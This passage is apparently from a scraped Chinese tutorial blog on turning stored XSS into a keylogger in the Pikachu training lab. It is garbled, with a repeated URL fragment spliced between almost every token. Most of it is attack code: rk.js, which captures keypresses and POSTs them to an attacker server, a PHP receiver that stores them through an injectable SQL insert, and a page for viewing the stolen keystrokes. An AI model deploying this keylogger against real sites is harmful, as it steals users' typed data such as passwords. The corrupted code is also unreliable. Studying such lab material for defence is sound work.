ajax=https://blog.csdn.net/qq_45555226/article/details/nullhttps://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/varhttps://blog.csdn.net/qq_45555226/article/details/ xl=https://blog.csdn.net/qq_45555226/article/details/"datax="https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/functionhttps://blog.csdn.net/qq_45555226/article/details/ onkeypresshttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/    varhttps://blog.csdn.net/qq_45555226/article/details/ realkey =https://blog.csdn.net/qq_45555226/article/details/ String.https://blog.csdn.net/qq_45555226/article/details/fromCharCodehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/event.https://blog.csdn.net/qq_45555226/article/details/keyCode)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    xl+=https://blog.csdn.net/qq_45555226/article/details/realkey;https://blog.csdn.net/qq_45555226/article/details/    showhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/document.https://blog.csdn.net/qq_45555226/article/details/onkeypress =https://blog.csdn.net/qq_45555226/article/details/ onkeypress;https://blog.csdn.net/qq_45555226/article/details/functionhttps://blog.csdn.net/qq_45555226/article/details/ showhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/    ajax =https://blog.csdn.net/qq_45555226/article/details/ createAjaxhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/onreadystatechangehttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ functionhttps://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/        ifhttps://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/ajax.https://blog.csdn.net/qq_45555226/article/details/readyState ==https://blog.csdn.net/qq_45555226/article/details/ 4https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/            ifhttps://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/ajax.https://blog.csdn.net/qq_45555226/article/details/status ==https://blog.csdn.net/qq_45555226/article/details/ 200https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/                varhttps://blog.csdn.net/qq_45555226/article/details/ data =https://blog.csdn.net/qq_45555226/article/details/ ajax.https://blog.csdn.net/qq_45555226/article/details/responseText;https://blog.csdn.net/qq_45555226/article/details/            }https://blog.csdn.net/qq_45555226/article/details/ elsehttps://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details/                alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"頁面請求失敗"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/            }https://blog.csdn.net/qq_45555226/article/details/        }https://blog.csdn.net/qq_45555226/article/details/    }https://blog.csdn.net/qq_45555226/article/details/    varhttps://blog.csdn.net/qq_45555226/article/details/ postdate =https://blog.csdn.net/qq_45555226/article/details/ xl;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/openhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"POST"https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ "http://攻擊者WEB服務器/rkserver.php"https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/truehttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/setRequestHeaderhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"Content-type"https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ "application/x-www-form-urlencoded"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/setRequestHeaderhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"Content-length"https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ postdate.https://blog.csdn.net/qq_45555226/article/details/length)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/setRequestHeaderhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"Connection"https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ "close"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ajax.https://blog.csdn.net/qq_45555226/article/details/sendhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/postdate)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/

(5)讀取rk.js惡意腳本傳來的鍵盤數據的文件rkserver.php

<?phphttps://blog.csdn.net/qq_45555226/article/details//** * Created by runner.han * There is nothing new under the sun */https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/config.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/mysql.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/connecthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details///設置允許被跨域訪問https://blog.csdn.net/qq_45555226/article/details/headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"Access-Control-Allow-Origin:*"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ $_POSThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'datax'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$queryhttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ "insert keypress(data) values('$datahttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/')"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$resulthttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/mysqli_queryhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/$queryhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/

(6)攻擊者讀取受害者的敲擊鍵盤數據的文件pkxss_keypress_result.php

<?phphttps://blog.csdn.net/qq_45555226/article/details/// error_reporting(0);https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/config.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/mysql.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/connecthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/// 判斷是否登錄,沒有登錄不能訪問https://blog.csdn.net/qq_45555226/article/details/ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/!https://blog.csdn.net/qq_45555226/article/details/check_loginhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/    headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"location:../pkxss_login.php"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/issethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'id'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ &&https://blog.csdn.net/qq_45555226/article/details/ is_numerichttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'id'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/    $idhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/escapehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ $_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'id'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $queryhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"delete from keypress where id=$idhttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    executehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ $queryhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/html>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/head>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/meta http-https://blog.csdn.net/qq_45555226/article/details/equiv=https://blog.csdn.net/qq_45555226/article/details/"Content-Type"https://blog.csdn.net/qq_45555226/article/details/ content=https://blog.csdn.net/qq_45555226/article/details/"text/html; charset=utf-8"https://blog.csdn.net/qq_45555226/article/details/ /https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/title>https://blog.csdn.net/qq_45555226/article/details/鍵盤記錄結果<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/title>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/link rel=https://blog.csdn.net/qq_45555226/article/details/"stylesheet"https://blog.csdn.net/qq_45555226/article/details/ type=https://blog.csdn.net/qq_45555226/article/details/"text/css"https://blog.csdn.net/qq_45555226/article/details/ href=https://blog.csdn.net/qq_45555226/article/details/"../antxss.css"https://blog.csdn.net/qq_45555226/article/details/ /https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/head>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/body>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/div id=https://blog.csdn.net/qq_45555226/article/details/"title"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/hhttps://blog.csdn.net/qq_45555226/article/details/1>https://blog.csdn.net/qq_45555226/article/details/pikachu Xss 獲取鍵盤記錄結果<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/hhttps://blog.csdn.net/qq_45555226/article/details/1>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/a href=https://blog.csdn.net/qq_45555226/article/details/"../xssmanager.php"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/返回首頁<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/a>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/div>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/div id=https://blog.csdn.net/qq_45555226/article/details/"xss_main"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/table border=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/1px"https://blog.csdn.net/qq_45555226/article/details/ cellpadding=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/10"https://blog.csdn.net/qq_45555226/article/details/ cellspacing=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/1"https://blog.csdn.net/qq_45555226/article/details/ bgcolor=https://blog.csdn.net/qq_45555226/article/details/"#5f9ea0"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/    <https://blog.csdn.net/qq_45555226/article/details/tr>https://blog.csdn.net/qq_45555226/article/details/        <https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/id<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/        <https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/記錄<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/        <https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/操作<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/    <https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/tr>https://blog.csdn.net/qq_45555226/article/details/    <https://blog.csdn.net/qq_45555226/article/details/?https://blog.csdn.net/qq_45555226/article/details/phphttps://blog.csdn.net/qq_45555226/article/details/     $queryhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"select * from keypress"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $resulthttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/mysqli_queryhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ $queryhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    whilehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/mysqli_fetch_assochttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$resulthttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/$htmlhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/<<<https://blog.csdn.net/qq_45555226/article/details/Ahttps://blog.csdn.net/qq_45555226/article/details/            {https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'id'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/        {https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'data'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/        {https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'id'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/">刪除    A;https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/                 echohttps://blog.csdn.net/qq_45555226/article/details/ $htmlhttps://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/                    }https://blog.csdn.net/qq_45555226/article/details/        ?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/    <https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/table>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/div>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/body>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/html>https://blog.csdn.net/qq_45555226/article/details/

(7)攻擊者原理

         攻擊者把payload發佈到留言板或者評論處,當受害者訪問該頁面的時候,就會觸發該xss漏洞,那麼該頁面就會外鏈攻擊者遠程服務器上的rk.js惡意腳本文件,該惡意腳本的功能就是把用戶的鍵盤數據以POST形式傳入到rkserver.php頁面,該頁面又把POST的數據內容,存儲到數據庫中。最後攻擊者可以通過自己的服務器上的pkxss_keypress_result.php頁面,訪問得到受害者的敲擊鍵盤的數據!

(8)受害者原理

         受害者訪問該留言板或評論頁面,此時會立刻觸發xss漏洞,也就是外鏈加載攻擊者遠程服務器上的rk.js腳本文件,該惡意腳本的功能就是把用戶的鍵盤數據以POST形式傳入到rkserver.php頁面,該頁面又把POST的數據內容,存儲到數據庫中以供攻擊者調用查看。

9、xss漏洞利用示例:鍵盤記錄器

(https://blog.csdn.net/qq_45555226/article/details/1)靶機: http://www.webtester.com/xss/xss02.php

(2)攻擊者WEB服務器:

攻擊者IP:www.https://blog.csdn.net/qq_45555226/article/details/exploit.https://blog.csdn.net/qq_45555226/article/details/coolhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/域名對應的IP https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168https://blog.csdn.net/qq_45555226/article/details/.97https://blog.csdn.net/qq_45555226/article/details/.https://blog.csdn.net/qq_45555226/article/details/130https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/攻擊者WEB服務的目錄:http:https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/www.https://blog.csdn.net/qq_45555226/article/details/exploit.https://blog.csdn.net/qq_45555226/article/details/cool/https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/pikachu/https://blog.csdn.net/qq_45555226/article/details/rkeypress/https://blog.csdn.net/qq_45555226/article/details/xfish/https://blog.csdn.net/qq_45555226/article/details/攻擊者存放提供基礎認證框的js惡意腳本:http:https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/www.https://blog.csdn.net/qq_45555226/article/details/exploit.https://blog.csdn.net/qq_45555226/article/details/cool/https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/pikachu/https://blog.csdn.net/qq_45555226/article/details/pkxss/https://blog.csdn.net/qq_45555226/article/details/rkeypress/https://blog.csdn.net/qq_45555226/article/details/rk.https://blog.csdn.net/qq_45555226/article/details/js攻擊者存放接收鍵盤數據的php文件:http:https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/www.https://blog.csdn.net/qq_45555226/article/details/exploit.https://blog.csdn.net/qq_45555226/article/details/cool/https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/pikachu/https://blog.csdn.net/qq_45555226/article/details/pkxss/https://blog.csdn.net/qq_45555226/article/details/rkeypress/https://blog.csdn.net/qq_45555226/article/details/rkserver.https://blog.csdn.net/qq_45555226/article/details/php攻擊者存放讀取鍵盤數據的php文件:http:https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/www.https://blog.csdn.net/qq_45555226/article/details/exploit.https://blog.csdn.net/qq_45555226/article/details/cool/https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/pikachu/https://blog.csdn.net/qq_45555226/article/details/pkxss/https://blog.csdn.net/qq_45555226/article/details/rkeypress/https://blog.csdn.net/qq_45555226/article/details/pkxss_keypress_result.https://blog.csdn.net/qq_45555226/article/details/php

(3)rk.js

/** * Created by runner on 20https://blog.csdn.net/qq_45555226/article/details/18/7/8. */https://blog.csdn.net/qq_45555226/article/details/functionhttps://blog.csdn.net/qq_45555226/article/details/ createAjaxhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/    varhttps://blog.csdn.net/qq_45555226/article/details/ request=https://blog.csdn.net/qq_45555226/article/details/falsehttps://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/window.https://blog.csdn.net/qq_45555226/article/details/XMLHttpRequest)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/        request=https://blog.csdn.net/qq_45555226/article/details/newhttps://blog.csdn.net/qq_45555226/article/details/ XMLHttpRequesthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/        ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/request.https://blog.csdn.net/qq_45555226/article/details/overrideMimeType)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/            request.https://blog.csdn.net/qq_45555226/article/details/overrideMimeTypehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"text/xml"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/        }https://blog.csdn.net/qq_45555226/article/details/    }https://blog.csdn.net/qq_45555226/article/details/elsehttps://blog.csdn.net/qq_45555226/article/details/ ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/window.https://blog.csdn.net/qq_45555226/article/details/ActiveXObject)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/        varhttps://blog.csdn.net/qq_45555226/article/details/ versions=https://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'Microsoft.XMLHTTP'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ 'MSXML.XMLHTTP'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ 'Msxml2.XMLHTTP.7.0'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/'Msxml2.XMLHTTP.6.0'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/'Msxml2.XMLHTTP.5.0'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ 'Msxml2.XMLHTTP.4.0'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ 'MSXML2.XMLHTTP.3.0'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ 'MSXML2.XMLHTTP'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/        forhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/varhttps://blog.csdn.net/qq_45555226/article/details/ i=https://blog.csdn.net/qq_45555226/article/details/0https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/ i<https://blog.csdn.net/qq_45555226/article/details/versions.https://blog.csdn.net/qq_45555226/article/details/length;https://blog.csdn.net/qq_45555226/article/details/ i++https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/            tryhttps://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/                request=https://blog.csdn.net/qq_45555226/article/details/newhttps://blog.csdn.net/qq_45555226/article/details/ ActiveXObjecthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/versions[https://blog.csdn.net/qq_45555226/article/details/i]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/                ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/request)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/                    returnhttps://blog.csdn.net/qq_45555226/article/details/ request;https://blog.csdn.net/qq_45555226/article/details/                }https://blog.csdn.net/qq_45555226/article/details/            }https://blog.csdn.net/qq_45555226/article/details/catchhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/e)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/                request=https://blog.csdn.net/qq_45555226/article/details/falsehttps://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/            }https://blog.csdn.net/qq_45555226/article/details/        }https://blog.csdn.net/qq_45555226/article/details/    }https://blog.csdn.net/qq_45555226/article/details/    returnhttps://blog.csdn.net/qq_45555226/article/details/ request;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/varhttps://blog.csdn.net/qq_45555226/article/details/ ajax=https://blog.csdn.net/qq_45555226/article/details/nullhttps://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/varhttps://blog.csdn.net/qq_45555226/article/details/ 